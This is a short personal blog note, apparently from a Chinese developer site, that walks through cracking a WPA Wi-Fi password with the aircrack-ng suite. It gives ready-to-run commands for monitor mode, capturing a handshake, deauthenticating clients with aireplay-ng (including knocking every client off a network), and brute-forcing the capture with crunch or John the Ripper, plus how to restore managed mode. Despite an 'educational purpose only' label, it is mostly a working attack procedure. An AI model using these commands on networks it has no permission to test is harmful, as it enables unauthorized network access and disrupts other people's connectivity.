Airmon-ng related note

--Educational purpose only--


1.airmon-ng start wlan0

after this a few need to get killed, so to enter monitor mode.  The wifi icon got disappeared.

2. airodump-ng wlan0 (can be other name like wlan0mon)

3. airodump-ng -c 11 -w WPA110 --bssid  80:89:17:41:DD:E0 wlan0
this step should be running

4. aireplay-ng -0 1 -a bssid? -c clientStation?

after a few times of 4, you should see handshake in 3, and stop both 3 and 4.


aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send multiple if you wish); 0 means send them continuously
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if this is omitted then all clients are deauthenticated
  • ath0 is the interface name
https://www.aircrack-ng.org/doku.php?id=deauthentication


5.crunch 8(the min) 8 (the max) abcd(the combine)|aircrack-ng YY_crack-01.cap -b bSSID? -w-

SHOULD HAVE USED WITH JOHN THE RIPPER!!!!! OTHERWISE CANNOT PAUSE...

john --session=foo --stdout --wordlist=wordlist.dic | aircrack-ng -w - -b 00:11:22:33:44:55 WPAcrack.cap
Option Description
--sessionThe name of the session
--wordlistThe name of the dictionary file
-bThe MAC address of the access point
WPAcrack.capThe name of the file that contains the authentication handshake


Press q or Ctrl-C to pause, then

john --restore=foo | aircrack-ng -w - -b 00:11:22:33:44:55 WPAcrack.cap

Credits: https://www.shellhacks.com/pause-resume-aircrack-ng/



Now, we gotta recover wifi so to get reconnected, i.e.managed mode:


1. ifconfig wlan0 down

2. iwconfig wlan0 mode managed

3. ifconfig wlan0 up

4. /etc/init.d/networking restart

5./etc/init.d/network-manager restart


Done!



  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

取啥都被占用

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值